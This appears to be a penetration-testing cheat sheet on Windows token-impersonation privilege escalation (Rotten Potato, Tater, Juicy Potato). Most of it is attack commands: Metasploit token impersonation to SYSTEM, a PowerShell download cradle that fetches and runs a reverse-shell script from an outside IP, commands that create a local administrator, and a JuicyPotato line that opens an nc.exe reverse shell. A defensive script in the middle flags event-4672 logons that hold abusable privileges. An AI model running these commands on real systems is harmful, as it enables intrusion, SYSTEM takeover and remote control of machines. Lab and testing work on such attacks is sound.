# Potatoes and Tokens

## Rotten Potato

How the Exploit Works:

Binary available at

### Using Metasploit
```
# metasploit
getuid
getprivs
use incognito
list_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate_token "NT AUTHORITY\SYSTEM"
```

With PowerSploit's Invoke-TokenManipulation:

```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
### Using Tater.ps1

Usage:

```powershell
# To import with Import-Module:
Import-Module ./Tater.ps1
# To import using dot source method:
. ./Tater.ps1
```

Examples:

```powershell
# Basic trigger 1 example
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

# Basic trigger 2 example
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

# Basic trigger 3 example - 2 steps
# Two system setup to get around port 80 being in-use on the privesc target
# WPAD System - 192.168.10.100 - this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port
Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
# Privesc Target - 192.168.10.101
Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100
```
## Tokens and Descriptions

Most commonly abused token privileges:

- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
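From the defender's side, the useful check is which non-SYSTEM accounts (service accounts, IIS application pools, scheduled-task identities) are being handed the privileges in this list, since Rotten/Juicy Potato only turns an impersonated SYSTEM token into a process when the caller holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. The script below is an added example, not code from the original notes: it scans Windows Security event 4672 ("Special privileges assigned to new logon") records and reports every non-SYSTEM logon granted any privilege from the list above, marking the ones that would satisfy a Potato-style attack. The one-line record format and the sample accounts are constructed for the example; real 4672 events carry the same field names but arrive as EVTX/XML.

```python
"""Flag logons that receive token privileges the Potato family abuses.

Added example for these notes (not part of the original page). Input is a
constructed, flattened rendering of Windows Security event 4672; the field
names (EventID, Account, Privileges) mirror the real event.
"""
import re

# Privileges from the "most commonly abused" list above.
ABUSED_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege",
    "SeTakeOwnershipPrivilege",
    "SeDebugPrivilege",
}

# The two privileges a Rotten/Juicy Potato-style escalation depends on.
POTATO_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample records: one flattened event per line.
SAMPLE_EVENTS = [
    "EventID=4672 Account=NT AUTHORITY\\SYSTEM Privileges=SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeDebugPrivilege",
    "EventID=4672 Account=IIS APPPOOL\\DefaultAppPool Privileges=SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege",
    "EventID=4672 Account=LAB\\svc-backup Privileges=SeBackupPrivilege SeRestorePrivilege",
    "EventID=4624 Account=LAB\\alice LogonType=3",
    "EventID=4672 Account=LAB\\alice Privileges=SeChangeNotifyPrivilege",
]

RECORD_RE = re.compile(
    r"EventID=(?P<id>\d+)\s+Account=(?P<account>.+?)\s+Privileges=(?P<privs>.*)$"
)


def parse_4672(line):
    """Return (account, set_of_privileges) for a 4672 record, else None."""
    m = RECORD_RE.match(line.strip())
    if not m or m.group("id") != "4672":
        return None
    return m.group("account"), set(m.group("privs").split())


def find_risky_grants(lines):
    """List non-SYSTEM logons that received any abused privilege.

    Each finding records the account, the abused privileges it was granted,
    and whether the grant includes a privilege the Potato exploits require.
    """
    findings = []
    for line in lines:
        parsed = parse_4672(line)
        if parsed is None:
            continue
        account, privs = parsed
        # SYSTEM legitimately holds all of these; it is not the audit target.
        if account.upper() == "NT AUTHORITY\\SYSTEM":
            continue
        hit = privs & ABUSED_PRIVILEGES
        if hit:
            findings.append({
                "account": account,
                "privileges": sorted(hit),
                "potato_capable": bool(privs & POTATO_PRIVILEGES),
            })
    return findings


if __name__ == "__main__":
    for f in find_risky_grants(SAMPLE_EVENTS):
        flag = "POTATO-CAPABLE" if f["potato_capable"] else "review"
        print(f"{flag:15} {f['account']}: {', '.join(f['privileges'])}")
```

On the constructed input the application-pool identity is reported as Potato-capable (it holds both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege), the backup service account is listed for review, and the interactive user with only SeChangeNotifyPrivilege is ignored. Event 4672 is noisy for SYSTEM, which is why the script drops that account rather than the event ID; the remaining hits are the accounts worth reviewing against the principle of least privilege.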
## Juicy Potato

Watch the ippsec video on Tally.

```
JuicyPotato.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.10 1234"
```

https://github.com/decoder-it/juicy-potato

```
T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
```

### CLSID

http://ohpe.it/juicy-potato/CLSID/

Picture Source: https://snowscan.io/htb-writeup-ethereal/#